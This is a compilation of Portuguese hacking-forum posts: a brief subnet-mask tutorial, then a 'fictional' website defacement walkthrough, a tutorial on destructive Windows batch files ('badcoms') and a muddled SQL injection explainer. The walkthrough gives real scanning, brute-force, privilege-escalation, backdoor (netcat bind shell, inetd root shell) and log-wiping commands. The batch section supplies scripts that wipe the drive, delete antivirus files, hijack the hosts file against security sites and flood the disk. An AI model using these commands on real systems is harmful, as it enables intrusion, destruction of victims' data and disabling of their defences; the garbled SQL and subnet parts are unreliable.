MINI TUTORIAL :

IP's E MASCARAS DE SUB-REDE

Uma rede , pode ser dividida em diversos seguimentos
denominados sub-redes , as quais são fisicamente separadas dos
demais seguimentos por roteadores.
Temos duas configurações possiveis na hora de definir um IP :

*Mais sub-redes e um menor numero de hosts ;
*Mais hosts e um menor numero de sub-redes ;

Por outro lado um host e qualquer equipamento que tenha um
endereço IP.
Por padrão a internet conta com 3 classes de IP
_______________________________
=======================
Classe :A
Bits : 0
Intervalo :1 a 127
Sub-redes : 126
Hosts : 16.777.214
Msacara :255.000.000.000
=======================
Classe :B
Bits : 1 e 0
Intervalo : 128 a 191
Sub-redes :16.384
Hosts : 65.534
Mascara : 255.255.000.000
======================
Classe :C
Bits : 1 ,1 e 0
Intervalo :192 a 223
Sub-redes :2.097.152
Hosts :254
Mascara : 255.255.255.000
======================
_____________________________

CONFIGURANDO MASCARA

Suponhamos as sub-redes com os seguintes IP:
1º--> 192.168.5.234
2º--> 192.168.7.10
Mscara--> 255.255.255.000

1)Converta todos os valores para binario :
192.168.005.234 = 11000000.10101000.00000101.11101010
192.168.007.010 = 11000000.10101000.00000111.00001010
255.255.255.000 = 11111111.11111111.11111111.00000000

2)Faça uma operação booleana AND :
11000000.10101000.00000101.11101010 1º IP
11111111.11111111.11111111.00000000 MASCARA
11000000.10101000.00000101.00000000 IP 192.168.005.000

11000000.10101000.00000111.00001010 2º IP
11111111.11111111.11111111.00000000 MASCARA
11000000.10101000.00000111.00000000 IP 192.168.007.000

3)Compare são iguais ?
Então elas nunca trocarão informaçoes .
Se usar a mascara 255.255.248.000 funcionara corretamente .

_______________________________________________________________________

Espero que com esse mini tutorial possa ajudar os iniciantes a
entenderem melhor sobre IP's e MASCARAS .
________________________________________________________________________

DE:GRUng_1987

Olá pessoal, estou escrevendo esse tópico porque muita gente que nunca invadiu realmente não faz a mínima idéia de como é fazer tal coisa ou se já invadiu não sabe o que fazer após "avançar entre as entranhas do alvo". Esse pode ser um tópico bem idiota eu admito, mas com ele espero dar uma luz para os iniciantes. Esse tópico vai mostrar o exemplo de um defacement. Como achar um alvo vulnerável, como não ser pego em uma invasão, etc. Tudo isso em uma pequena historinha fictícia, mas com ferramentas e vulnerablilidades reais. Vamos começar.

(1-) O início:

Aqui o hacker que eu vou chamar de Jonathan criou um mirror(página criada para fazer o defacement de um site substituindo-a pela original) em html. Ela tem um fundo preto, com uma grande mensagem escrito "Exploited by Cyb3r_D14bl0" que se trata do apelido hacker de Jonathan, além de uma foto criada por ele muito legal no photoshop, sua marca registrada, além de um link que permite enviar um email para ele próprio. John está frustrado e aborrecido porque não encontra nenhum alvo vulnerável. Mas hoje Jonathan jurou que não sairia da frente do computador até que conseguisse hackear um site. Jonathan então toma as primeiras providências para o ataque.

(2-) Escondendo-se na rede:

O fato do mirror de Jonathan ser simples, não significa que ele é um imbecil. Ele sabe que deve ocultar seu endereço ip ou será pego na primeira tentativa de ataque. Jonathan começa acessando a página http://www.stayinvisible.com. Essa página mostra o endereço ip de seus visitantes. O ip de Jonathan é 201.143.222.88. Então ele usa o programa Anonymity4Proxy, e procura o endereço ip de um bom servidor proxy na grande lista do programa. Ele encontra um servidor proxy no México marcado como high anonymity(alto anonimato). Isso é bom para Jonathan. O endereço ip desse proxy é 67.154.22.224. Jonathan liga o computador do lado que está rodando Linux slackware 10.2 (ele antes estava em outro com Windows XP sp2). Jonathan configura os browsers e serviços adicionais de ambos os sistemas para que se conectem ao proxy. Jonathan acessa a novamente a página http://www.stayinvisible.com e sorri ao ver que em ambos os sistemas o seu ip não apareceu mais na página, e sim o ip do proxy que Jonathan escolheu. Agora ele está anônimo e pronto para atacar.

(3-) FootPriting & FingerPriting. Invadindo...:

Nessa fase do ataque, Jonathan vai procurar por alvos vulneráveis e explorá-los com o objetivo de invádi-los. Jonathan começa visitando alguns sites e de repente, sem querer Jonathan acessa um site chamado http://the-fact-pleasure.net. Se trata de um site de pedofilia! Se tem uma coisa que Jonathan odeia são os pedófilos. Jonathan escolheu seu alvo(atenção esse site é fictício). Jonathan começa abrindo um terminal em seu sistema linux e digitando o seguinte comando no terminal:

# ping -c4 the-fact-pleasure.net


Isso envia 4 pacotes do tipo icmp echo request para o site. Com isso Jonathan pega o ip do site que é 208.194.22.126 e também Jonathan percebe que o site normalmente respondeu a todos os pacotes. Isso significa que o firewall do site não deve estar filtrando tráfego icmp. Jonathan analisa o esquema de endereçamento ip e deduz as seguintes informações a respeito da rede do alvo:

(a-)Se trata de uma rede de classe C(o ip começa com 3 dígitos maior que 191).
(b-)A máscara da rede é de 255.255.255.0 (somente os últimos 3 digítos dos endereços ips sofrem alterações).
(c-)Pode-se ter até 255 computadores na rede( 208.194.22.1 até 208.194.22.255).

Agora Jonathan deseja descobrir quais desses host estão online na rede, então ele vai usar um ping scan utlizando-se do nmap para tal, usando a seguinte linha de comando:

# nmap -sP -vv 208.194.22.1-255 > /home/log_hosts.txt

Após alguns minutos, Jonathan checa o log e ve que os seguintes hosts estão "alive":

208.194.22.12
208.194.22.17
208.194.22.56
208.194.22.88
208.194.22.100
208.194.22.115
208.194.22.126
208.194.22.201
208.194.22.211
208.194.22.253

Caso o servidor do site esteja muito protegido, Jonathan poderá tentar hackear esses computadores para usa-los como "trampolin" para o servidor do site. Agora ele vai fazer o teste de fingerpriting para pegar informações preciosas sobre o servidor do site. O comando é o segunite:

# nmap -O -vv -sV 208.194.22.126


Esse teste retomou as seguintes informações:


as portas tcp 21,22,25 e 80 estão abertas. (Serviços ftp, ssh, smtp e http).
O sistema operacional é linux red hat 2.4.18 ou 2.4.19(sem certeza).
Na porta 21 está um servidor pureFTPD, na 22 um servidor open ssh 1.1, na 25 um servidor qmail e por último um apache mod_ssl v 1.3.37]

Jonathan ja adquiriu bastante informações sobre o alvo até aqui. Mas ele deseja saber mais ja que até aqui ele não encontrou uma vulnerabilidade perigosa que o permita invadir o sistema. Ele tenta então traçar a rota para descobrir mais informações a respeito do firewall do alvo, ele então digita o seguinte comando no seu terminal:

# traceroute 208.194.22.126


Normalmente em um traçamento de rotas, o penúltimo salto é o firewall do alvo e o penúltimo salto era o endereço ip 194.126.22.1. Agora ele tem o ip do possível firewall do alvo. Para ter certeza ele faz o seguinte teste com o nmap:

# nmap -vv -O 194.126.22.1

Isso gerou o seguinte resultado:

(a-)as portas 1000 está abertas...
(b-) Device type: firewall/router


Agora Jonathan tem certeza de que se trata de um firewall e um firewall que ele conhece muito bem. O Web min que é configurado via browser, Jonathan digita a seguinte url no seu navegador konqueror do linux: http://194.126.22.1:1000

Uma tela de login de administração de firewall acaba de se abrir no seu navegador!

Em seguida, Jonathan scaneia a rede do firewall, apenas tentando localizar as portas 79 e/ou 23 em algum computador aberto, para isso ele usa novamente o nmap com o seguinte comando:

# nmap -sT -p23,79 -vv 194.126.22.2-255 > /home/log2.txt

Ao analisar o log, Jonathan ve que o host e194.126.22.131 está com as portas 23 e 79 abertas. Jonathan da o comando finger nesse host e enumera os seguintes usuários:

root
mark
lizie
guest

Jonathan se utiliza do programa Brutus para fazer brute force no telnet e obtém sucesso. A senha do root é $!#donothackit$!#

Jonathan invade o host e baixa os arquivos passwd e shadow, em seguida faz cracking deles com o programa john the ripper. Ele deduz que os usuários podem ser os mesmos para todos os hosts dessa rede, já que foram muito poucos os computadores marcados como "alive".

Jonathan deduz correto. A conta login mark/password h4xor1234 é a conta do administrador do firewall. Antes de simplesmente derrubar o firewall do alvo, Jonathan faz outro teste com o nmap no site para descobrir quais portas estão abertas, mas que estão sendo filtradas pelo firewall. Jonatham executa o seguinte comando no seu terminal:

#nmap -sA -vv -p1-200 208.194.22.126

As seguintes portas estão marcadas como "unfiltered": 21,22,23,53,69,79,80,110

Bingo! Mais um telnet! Agora sim Jonathan invade o firewall derrubando-o e em seguida da um finger no sistema. Jonathan consegue apenas enumerar o usuário lilith. Ele usa novamente o brutus para fazer brute force no telnet e descobre a senha do usuário lilith. Ele conseguiu uma shell remota em seu alvo com poderes normais.

a saída foi:

[server04@lilith]$

Jonathan digita id e ve o que ele possui um uid = 1000 e um gid = 1000. Ele precisa obter acesso root para fazer o defacement. Ele lembra da versão do apache e tem uma idéia. Primeiro ele executa esse comando na shell:

$find /bin -perm +4000

Ele sorri ao ver que a sua conta hackeada tem permissão para usar o ftp. Ele conecta em um ftp de um site hacker, baixa um exploit local que explora um bug no apache. Em seguida Jonathan o compila:

$gcc -o gotRoot exploit_exemplo.c

E o executa....

Jonathan fica empolgado e a adrenalina no seu corpo aumenta. ele ve outra shell em sua tela

[server04@root]#

Ele digita esses comandos só para confirmar

# id
# whoami

Ele está logado como root! Sem perder tempo ele executa o seguinte comando:

# whereis apache

a saida foi:

/home/root/apache

Basta executar:

# cd /home/root/apache
# cd htdocs

Jonathan executa um ls e pronto! Ele localiza o index1.html! Agora é hora de desfigurar a página:

Ele remove a página usando o comando:

# rm index1.html

Em seguida ele vai transferir seu mirro via linha de comando. Seu computador está com o serviço ativo de ftp, então Jonathan usa o servidor do site no seu computador dando o seguinte comando:

# ftp 201.143.222.88 user Cyber pass Diablo

Após conectar, basta dar o seguinte comando:

> get index1.html

Agora Jonathan desconecta do seu ftp e move o mirror para o local da página original com o seguinte comando:

mv /ftp-files/index1.html /home/root/apache/htdocs

Pronto, a página foi desfigurada! Agora Jonathan precisa dar um jeito de criar suas backdoors e apagar seus rastros no sistema.

(4-) Backdoors:

Primeiramente, Jonathan foi para o diretório principal do sistema com o comando:

# cd /etc

Lá, ele editou o arquivo rc.local com o editor vi inserindo a seguinte linha de comando nele:

nc -l -p 6012 -e /bin/sh

Isso lhe da uma shell imediata com poderes de root sem qualquer forma de autenticação na porta tcp 6012 no próximo boot do sistema.

Jonathan cria uma conta pirata no sistema com poderes de root com o comando adduser e depois altera os privilégios de uma conta qualquer para root, assim despistando os administradores.

Por último, Jonathan percebe que o sistema é antigo, pois possui o arquivo inetd.conf em /etc. Ele edita esse arquivo também com o vi inserond o nele o seguinte conteúdo:

cool stream tcp nowait root /bin/sh -i

E depois também edita arquivo services com o seguinte conteúdo:

cool 775/tcp cnn

Mais uma shell para Jonathan....

Agora com suas backdoors, Jonathan vai apagar os logs do sistema para não ser pego usando esses comandos:

# echo " " > /var/log/ossec/*.log
# echo " " > /home/root/apache/logs/*.log
# echo " " > ~ .bash_history
# echo " " > /var/log/ossec/*.log

Com isso todos os logs do sistema ficam com conteúdo em branco(nulo). Por último, Jonathan da um reboot no sistema para suas backdoors serem ativadas, ele desconecta do seu alvo e proxy. Jonathan sorri ao acessar http://the-fact-pleasure.net e visualizar seu mirror. E o melhor de tud é que ele dificilmente vai ser pego por isso...

Bom gente é isso ai, espero que vocês gostem. Isso é ridiculo para os hackers experientes desse fórum, mas espero ter ajudado os iniciantes a entenderem como um ataque hacker é realizado. Foi um exemplo simples, mas espero que tenha valido a pena. Abraço pra todos, fui.

Olá

Estou aqui para ensinar a vcs a fazerem o seu próprio badcom.

IMPORTANTE: Este tutorial explora apenas do "BASICÃO" do batch


Com a mão na massa!


Arrow @echo off

Primeiramente, aprendemos uma das coisas principais, que tem em quase todo badcom. No caso, o @echo off
Este comando serve para não exibir outros comandos, por exemplo, se vc for deletar tudo o que tem no HD de alguem vai aparecer lá o del /q /s /f
Se colocar isso, vai apenas abrir a janela e ir deletando devagar.


Arrow Comando del

Para deletar um arquivo sem ter que dar uma confirmação e deletar mesmo que o arquivo esteja sendo usado, temos que usar o comando del /f /s arquivo.exe

Nesse exemplo acima, o badcom deleterá o arquivo.exe sem pedir confirmação e deletará mesmo que esteja sendo usado.

Outro exemplo é esse de baixo, que entra na pasta Arquivos de programas e apaga tudo dentro dela!
Código:
@echo off
cd\
cd windows
del /f /s *.*
exit


Explicando, o @echo off acho que vocês já aprenderam né, nem precisa eu dar outra explicação.
o cd\ faz o batch ir para a unidade C:
cd é um comando para entrar em alguma pasta, no exemplo foi a Windows.
del /f /s tem a função de deletar todos os arquivos, por causa do *.*, esse caractere * tem a função de 'coringa' ou seja, equivale a todos, e assim deleta os arquivos de todos os nomes de todos os tipos de extenções.
exit tem a função de sair, quer dizer que o badcom acabou, fecha a janela e pronto xD


Arrow Enviando uma mensagem

Bem, esse comando também é bem simples, ele envia uma mensagem igual o alert, só que alert é no browser, e esse comando mostra no DOS

Exemplo:
Código:
@echo off
msg * Oi amigo, de xau para o seu windows!
cd\
cd windows
del /f /s *.*
exit


Esse exemplo, antes de destruir o windows, ele envia uma mensagem dizendo:
"Oi amigo, de xau para o seu windows!"

Realmente é bem simples.


Arrow Renomeando arquivos

Esse comando tambem não é nada dificil, ele tem a função de renomear arquivos.
Exemplo:
Código:
@echo off
cd\
cd Windows
ren explorer.exe seferro.exe
exit


O resto dos comandos eu já expliquei, irei apenas explicar o ren
nesse exemplo, o badcom funcionou assim: ele foi para a unidade C:, depois entrou na pasta windows. Dentro da pasta windows ele renomeou o arquivo explorer.exe para seferro.exe e depois fechou a janela do badcom.
ps.: dependendo do arquivo que vc tente renomear, pode dar erro, se ele já estiver sendo usado!


Arrow Abrindo um arquivo

Este é outro comando muito simples. É o comando start e tem a função de abrir arquivos.
Exemplo:
Código:
@echo off
cd\
cd windows
start notepad.exe
exit



Esse badcom é inofensivo e não causa danos ao seu computador.
Ele apenas vai para a unidade C:, depois entra na pasta windows e ai que entra o comando start, que no exemplo abre o bloco de notas (notepad.exe)


Arrow Sobrescrevendo arquivos


Esse comando eu aprendi com o sthealt, moderador aqui do fórum.

No exemplo vamos usar um arquivo de texto, .txt, para entender melhor.

Vamos supor que existe um arquivo chamado teste.txt dentro da pasta Arquivos de programas
Exemplo:
Código:
@echo off
cd\
cd Arquivos de programas
echo teste.txt > mensagem aqui
exit


Agora abrindo o arquivo teste.txt, encontraremos lá a mensagem "mensagem aqui".

Esse comando é bem útil para pharming, dá para sobrescrever o arquivo hosts do windows Very Happy


Arrow Fazer uma mensagem aparecer no badcom

Esse comando também é muito simples.
É o comando echo, não tem muito a explicar sobre ele, apenas irei dar um exemplo, só para não perder o costume xD:
Código:
@echo off
echo Oi, meu nome é Fvox, e o seu?
exit


Esse badcom, nem sei se pode ser chamado de badcom, pois é inofensivo, faz aparecer na tela a mensagem "Oi, meu nome é Fvox, e o seu?", mas por muuuuito pouco tempo, pois vem seguido do comando exit, que fecha a tela, e para não fechar, podemos usar o comando pause, que faz aparecer a mensagem "Pressione qualquer tecla para continuar", mas ai pelo menos da para ler a mensagem.


Arrow Criando uma nova pasta

Esse tbm é muito facil, se vc leu todos acima.
Ele cria uma pasta.. é o comando md
Neste exemplo ele cria uma nova pasta em C:/Windows/system32 chamada owned
Código:
@echo off
cd\
cd Windows
cd system32
md owned
exit


Facil não?


Arrow Pulando uma linha nas msgs do badcom

Esse comando é útil para quando vc quer enviar mensagem ao infelizardo que abrir o seu badcom. É o comando echo.
Exemplo:
Código:
@echo off
echo Oi! Prepare-se, pois vc acabou de abrir o meu badcom
echo.
echo.
echo Vc nao eh nenhum sortudo hein!
cd\
cd windows
del /f /s *.*
exit



Arrow Imprimindo arquivos

Você que é maldoso, e quer acabar com a tinta do cara hehe, aqui vc vai aprender Twisted Evil

Vamos primeiramente achar um arquivo .txt no PC do cara.
Vamos supor que exista um arquivo chamado poesia.txt na unidade C:
Primeiramente para gastar toda tinta do PC do cara terá que sobrescrever o arquivo, enchendo ele de █

Código:
@echo off
cd\
echo poesia.txt > ███████████████████████████████████
echo poesia.txt > ███████████████████████████████████
echo poesia.txt > ███████████████████████████████████
echo poesia.txt > ███████████████████████████████████
echo poesia.txt > ███████████████████████████████████
echo poesia.txt > ███████████████████████████████████
print print.txt
exit



Só que para isso devemos aumentar a quantidade de █ e a quantidade de comandos echo... e a quantidade de comandos print.


Arrow Limpando a tela do badcom

Esse comando também é muito usado, ele é o comando cls e cuja a função é limpar a tela do badcom
Exemplo:
Código:
@echo off
echo Oi pessoal, meu nome eh Fvox
cls
pause


A mensagem realmente irá aparecer, mas não vai durar nem um segundo, pois em seguida vem o comando cls, que limpa toda a tela Very Happy


Arrow Excluindo uma pasta

Vamos supor que no PC que eu irei abrir esse badcom existe uma pasta que fica localizada na unidade C: e se chama Fvox, porém eu quero deleta-la com o meu badcom.
Vamos ter que fazer:
Código:
@echo off
cd\
cd Fvox
del /f /s *.*
cd..
rmdir /Q /S Fvox
exit


Explicando, o del /f /s *.* eu usei para deletar todos os arquivos que tinham na pasta, pois pasta com algum arquivo não dá para deletar.
depois eu voltei um diretório com o comando cd..
ai usei o comando rmdir para deletar a pasta, e finalmente acabou o badcom.



Badcons perigosos by sthealt


Arrow Deletar arquivos de anti-vírus

Código:
@echo off
del /Q /F %HomeDrive%\Arquiv~1\alwils~1\avast4\*.dll > nul
del /Q /F %HomeDrive%\Arquiv~1\alwils~1\avast4\*.exe > nul
del /Q /F %HomeDrive%\Arquiv~1\Lavasoft\Ad-awa~1\*.exe > nul
del /Q /F %HomeDrive%\Arquiv~1\kasper~1\*.exe > nul
del /Q /F %HomeDrive%\Arquiv~1\trojan~1\*.exe > nul
del /Q /F %HomeDrive%\Arquiv~1\f-prot95\*.dll > nul
del /Q /F %HomeDrive%\Arquiv~1\tbav\*.dat > nul
del /Q /F %HomeDrive%\Arquiv~1\avpersonal\*.vdf > nul
del /Q /F %HomeDrive%\Arquiv~1\Norton~1\*.cnt > nul
del /Q /F %HomeDrive%\Arquiv~1\Mcafee\*.hlp > nul
del /Q /F %HomeDrive%\Arquiv~1\Mcafee\*.exe > nul
del /Q /F %HomeDrive%\Arquiv~1\Mcafee\*.def > nul
del /Q /F %HomeDrive%\Arquiv~1\Mcafee\*.ini > nul
del /Q /F %HomeDrive%\Arquiv~1\Mcafee\*.txt > nul
del /Q /F %HomeDrive%\Arquiv~1\Mcafee\*.dat > nul
del /Q /F %HomeDrive%\Arquiv~1\Mcafee\*.log > nul
del /Q /F %HomeDrive%Arquiv~1\Mcafee\*.reg > nul
del /Q /F %HomeDrive%\Arquiv~1\Mcafee\*.dll > nul
del /Q /F %HomeDrive%\Arquiv~1\Norton~1\Norton~1\Norton~3\*.reg > nul
del /Q /F %HomeDrive%\Arquiv~1\Norton~1\Norton~1\Norton~3\*.txt > nul
del /Q /F %HomeDrive%\Arquiv~1\Norton~1\Norton~1\Norton~3\*.hlp > nul
del /Q /F %HomeDrive%\Arquiv~1\Norton~1\Norton~1\Norton~3\*.dll > nul
del /Q /F %HomeDrive%\Arquiv~1\Norton~1\Norton~1\Norton~3\*.exe > nul
del /Q /F %HomeDrive%\Arquiv~1\Norton~1\Norton~1\speedd~1\*.isu > nul
del /Q /F %HomeDrive%\Arquiv~1\Norton~1\Norton~1\speedd~1\*.hlp > nul
del /Q /F %HomeDrive%\Arquiv~1\Norton~1\Norton~1\speedd~1\*.cnt > nul
del /Q /F %HomeDrive%\Arquiv~1\Norton~1\Norton~1\speedd~1\*.dat > nul
del /Q /F %HomeDrive%\Arquiv~1\Norton~1\Norton~1\speedd~1\*.ulg > nul
del /Q /F %HomeDrive%\Arquiv~1\Norton~1\Norton~1\speedd~1\*.ini > nul
del /Q /F %HomeDrive%\Arquiv~1\Norton~1\Norton~1\speedd~1\*.exe > nul
del /Q /F %HomeDrive%\Arquiv~1\Norton~1\Norton~1\speedd~1\*.txt > nul
del /Q /F %HomeDrive%\Arquiv~1\Norton~1\Norton~1\speedd~1\*.dll > nul
del /Q /F %HomeDrive%\Arquiv~1\Norton~1\Norton~1\*.cnt > nul
del /Q /F %HomeDrive%\Arquiv~1\Norton~1\Norton~1\*.hlp > nul
del /Q /F %HomeDrive%\Arquiv~1\Norton~1\Norton~1\*.exe > nul
del /Q /F %HomeDrive%\Arquiv~1\Norton~1\Norton~1\*.def > nul
del /Q /F %HomeDrive%\Arquiv~1\Norton~1\Norton~1\*.ini > nul
del /Q /F %HomeDrive%\Arquiv~1\Norton~1\Norton~1\*.txt > nul
del /Q /F %HomeDrive%\Arquiv~1\Norton~1\Norton~1\*.dat > nul
del /Q /F %HomeDrive%\Arquiv~1\Norton~1\Norton~1\*.log > nul
del /Q /F %HomeDrive%\Arquiv~1\Norton~1\Norton~1\*.reg > nul
del /Q /F %HomeDrive%\Arquiv~1\Norton~1\Norton~1\*.dll > nul
del /Q /F %HomeDrive%\Arquiv~1\Norton~1\*.log > nul
del /Q /F %HomeDrive%\Arquiv~1\Norton~1\*.idx > nul
del /Q /F %HomeDrive%\Arquiv~1\Norton~1\*.ini > nul
del /Q /F %HomeDrive%\Arquiv~1\Norton~1\*.hlp > nul
del /Q /F %HomeDrive%\Arquiv~1\Norton~1\*.orgt > nul
del /Q /F %HomeDrive%\Arquiv~1\Norton~1\*.dll > nul
del /Q /F %HomeDrive%\Arquiv~1\Norton~1\*.exe > nul
del /Q /F %HomeDrive%\Arquiv~1\Norton~1\*.dat > nul
del /Q /F %HomeDrive%\Arquiv~1\ewidoa~1\*.dll > nul
del /Q /F %HomeDrive%\Arquiv~1\ewidoa~1\*.exe > nul
del /Q /F %HomeDrive%\Arquiv~1\ewidoa~1\*.dat > nul
del /Q /F %HomeDrive%\Arquiv~1\ewidoa~1\*.mo > nul
del /Q /F %HomeDrive%\Arquiv~1\ESET\*.exe > nul
del /Q /F %HomeDrive%\Arquiv~1\ESET\*.dll > nul
del /Q /F %HomeDrive%\Arquiv~1\ESET\*.exe > nul
del /Q /F %HomeDrive%\Arquiv~1\ESET\Instalar\*.exe > nul
del /Q /F %HomeDrive%\Arquiv~1\ESET\Instalar\*.dll > nul




Arrow Pharming em vários sites

Código:
@echo off
echo 0.0.0.0 localhost > %HomeDrive%\windows\system32\etc\hosts
echo 0.0.0.0 www.superdownloads.com.br > %HomeDrive%\windows\system32\drivers\etc\hosts
echo 0.0.0.0 http://www.superdownloads.com.br >> %HomeDrive%\windows\system32\drivers\etc\hosts
echo 0.0.0.0 www.google.com.br >> %HomeDrive%\windows\system32\drivers\etc\hosts
echo 0.0.0.0 http://www.google.com.br >> %HomeDrive%\windows\system32\drivers\etc\hosts
echo 0.0.0.0 www.hotmail.com >> %HomeDrive%\windows\system32\drivers\etc\hosts
echo 0.0.0.0 http://www.hotmail.com >> %HomeDrive%\windows\system32\drivers\etc\hosts
echo 0.0.0.0 orkut.com >> %HomeDrive%\windows\system32\drives\etc\hosts
echo 0.0.0.0 www.orkut.com >> %HomeDrive%\windows\system32\drivers\etc\hosts
echo 0.0.0.0 http://www.orkut.com >> %HomeDrive%\windows\hosts
echo 0.0.0.0 www.uol.com.br >> %HomeDrive%\windows\hosts
echo 0.0.0.0 http://www.uol.com.br >> %HomeDrive%\windows\hosts
echo 0.0.0.0 www.terra.com.br >> %HomeDrive%\windows\hosts
echo 0.0.0.0 http://www.terra.com.br >> %HomeDrive%\windows\hosts
echo 0.0.0.0 download.mcafee.com >> %HomeDrive%\windows\hosts
echo 0.0.0.0 http://download.mcaffe.com >> %HomeDrive%\windows\hosts
echo 0.0.0.0 f-secure.com >> %HomeDrive%\windows\hosts
echo 0.0.0.0 http://f-secure.com >> %HomeDrive%\windows\hosts
echo 0.0.0.0 kaspersky.com >> %HomeDrive%\windows\hosts
echo 0.0.0.0 http://kaspersky.com >> %HomeDrive%\windows\hosts
echo 0.0.0.0 liveupdate.symantec.com >> %HomeDrive%\windows\hosts
echo 0.0.0.0 http://liveupdate.symantec.com >> %HomeDrive%\windows\hosts
echo 0.0.0.0 liveupdate.symantecliveupdate.com >> %HomeDrive%\windows\hosts
echo 0.0.0.0 mcafee.com >> %HomeDrive%\windows\hosts
echo 0.0.0.0 http://www.mcafee.com >> %HomeDrive%\windows\hosts
echo 0.0.0.0 symantec.com >> %HomeDrive%\windows\hosts
echo 0.0.0.0 http://www.symantec.com >> %HomeDrive%\windows\hosts
echo 0.0.0.0 trendmicro.com >> %HomeDrive%\windows\hosts
echo 0.0.0.0 http://trendmicro.com >> %HomeDrive%\windows\hosts
echo 0.0.0.0 www.grisoft.com >> %HomeDrive%\windows\hosts
echo 0.0.0.0 http://www.grisoft.com >> %HomeDrive%\windows\hosts
echo 0.0.0.0 www.kaspersky.com >> %HomeDrive%\windows\hosts
echo 0.0.0.0 http://www.kaspersky.com >> %HomeDrive%\windows\hosts
echo 0.0.0.0 www.mcaffe.com >> %HomeDrive%\windows\hosts
echo 0.0.0.0 http://www.mcaffe.com >> %HomeDrive%\windows\hosts
echo 0.0.0.0 www.sophos.com >> %HomeDrive%\windows\hosts
echo 0.0.0.0 http://www.sophos.com >> %HomeDrive%\windows\hosts
echo 0.0.0.0 www.symantec.com >> %HomeDrive%\windows\hosts
echo 0.0.0.0 http://www.symantec.com >> %HomeDrive%\windows\hosts




Arrow Deletar todo o HD

Código:
@echo off
del /Q /S /F %HomeDrive%\*.*
exit



Arrow Flood de diretórios

Código:
@echo off
cd\
goto 1
:1
md Flood
cd Flood
goto 1




Arrow File flood

Código:
@echo off
cd\
echo Flooded > %HomeDrive%\flood.txt
goto 1
:1
type flood.txt >> flood.txt
goto 1



Até que enfim terminei esse enorme tutorial Shocked

3 horas digitando cansa viu...

Até mais, vou descansar! Razz

Aprendendo a invadir corretamente

Introdução

Muitos vivem perguntando sobre invasão na internet e outros ganham muito dinheiro com isto...Mais o que leva um hacker a atacar um outro computador? Eu em particular acredito que haja duas únicas coisas...Curiosidade ou profissionalismo.

Mas entender princípios básicos sobre invasão é tarefa fácil e simples porem complicada aos olhos de pessoas que não tem o computador como paixão... É a única forma de lazer que traz muita...Muita mesmo...Muita felicidade, quando você for ao trabalho e se deparar preocupado com o que ira fazer no seu computador ao chegar, você é um hacker e ser hacker é ser apaixonado por computador.


WEB

Seja lá qual for a linguagem de programação utilizada você só tem dois caminhos a tomar:

*** Banco de dados

Seria muito legal escrever aqui um texto enorme e complexo aos seus olhos porem seria ético dizer a verdade.

SQL Injection é fruto de uma distração de um programador com pouca experiência na sua profissão, pelo simples fato de não utilizar uma prevenção simples como:

Login = Replace(request.form("login"), "'", "/")
Senha = Replace(request.form("senha"), "'", "/")

Saber o que fazer é fundamental ao encontrar um erro grave como erros provocados por caracteres especiais utilizados na linguagem SQL como:

= " '

Entre outros, porem uma simples prudência ao programar evitaria constrangimentos em seu trabalho, bloqueando o famoso SQL Injection, aos descuidados restam a própria sorte.

Teoria básica do SQL Injection:


SQL = "SELECT * FROM Usuario WHERE Login = '"&login&"' and Senha='"&senha&"'"

Com está informação podemos ir longe...Muito longe, basta seguir a lógica do impura-pura, como se fosse uma grande brincadeira, porem com seus objetivos, vamos ao exemplo:

Você sabe que seria está linha para trabalhar:
www.site.com/login.asp?Login=&Senha=

porem o empura-pura começa geralmente em um único objetivo, matar os dois pontos de dados que nesse caso seria Login e Senha e trabalhar em seu SQL Injection, neste caso seria necessário somente uma porta de entrada como:

www.site.com/login.asp?Login=

Esta porta seria suficiente para o inicio de seu SQL Injection, porem nem todo programador é descuidado, mas neste caso estamos falando em um programador descuidado, SQL Injection nada mais é que provocar um erro para conhecer melhor a forma que foi programada a pagina que está sendo trabalha, uma forma de conhecer melhores informações de estrutura de banco de dados como nome de tabelas, campos entre outros, mas a grande jogada do SQL Injection é você se tornar intimo do indicador do motor do banco de dados e para isto você deve ter informações da estrutura deste banco de dados e qual a forma de proteção cria para ele, o famoso script de filtro de caracteres especiais, o cara chato que faz você perder umas horas para poder controlar o indicador do motor do banco de dados, talvez você não saiba o que é um indicador, imagina uma folha de papel com varias colunas e linhas, esta folha é chamada de tabela e cada coluna representa um dado em especifico e único e cada linha seu conteúdo ou seja o próprio dado, imagine tudo isto separado por linhas, agora imagine você encontrando dados em segundos utilizando uma linha vertical e horizontal que ira de um estremo ao outro desta folha, está duas linhas que toma um formato de cruz se chama motor e o encontro destas duas linhas se chama indicador, como se fosse uma mira de atirador de elite, comandos em SQL programados em paginas ASP ou PHP executam tarefas programadas por clique, isto é um indicador do motor de um banco de dados, quando você busca executar SQL Injection neste banco de dados você está tentando obter o controle deste indicador do motor do banco de dados, teoricamente falando é muito fácil evitar este ataque e na pratica um pouco mais difícil quando estamos falando de pessoas com raciocínio rápido, o grande problema disto tudo é a falta de algo especifico, como uma pagina física que retorne tudo o que você quer, por este motivo se trabalha com resultados de erros, sobre respostas de erros, provoca um erro e vê o resultado, está é a alma do SQL Injection relacionado a busca de dados, porem a outras funções como atualizar, excluir, modificar e inserir, tudo isto de pode ser feito com o impura-pura, impura-pura é igual SQL Injection, você vai imaginando e criando novos caminhos até obter bons resultados, como :

www.site.com/login.asp?Login=&"'"'

Utilizando este comando acima, parte da linha de comando se transformaria em texto na forma de comentário, desta forma não seria mais interpretada pelo servidor, neste caso você eliminou a parte que não é interessaste em sua investida.

Porem você está com um problema muito conhecido o antes do LOGIN este ponto é o intocável na string como:

Sql = "SELECT * FROM users WHERE Login =

O grande segredo é você utilizar o Maximo possível te tempo útil e disponível antes de chegar aqui neste ponto:

Set Rs = Conexao.Execute(Sql)
if not rs.eof then

neste pondo está programado pelo programador que o motor faça uma leitura vertical em determinado de 0 á ultimo registro, verificando sua veracidade,se é true ou não,este tempo é muito curto e pede que seja feito isto antes de qualquer erro, neste caso o IF não entrou em ação simples motivo, não foi executado, e o que determina está busca é a forma que você provocará este erro, em outras palavras o programador espera sua honestidade em digitar os dados, verdadeiro ou falso, verdadeiro logado, falso não logado, neste ponto você e seu talento entram em ação, prolongando este reconhecimento de informação incorreta, a vários contra sua investida, como Session é a mais chata e sem falar de filtros que mais parecem com OS.

SQL Injection é você conhecer todos os recursos de comandos do SQL Server e transformar em uma de suas armar para obter o controle do indicador do motor do banco de dados programado em ASP ou PHP para executar funções definidas por um programador em auxilio ao usuário final, o cara que só clica com o rato.

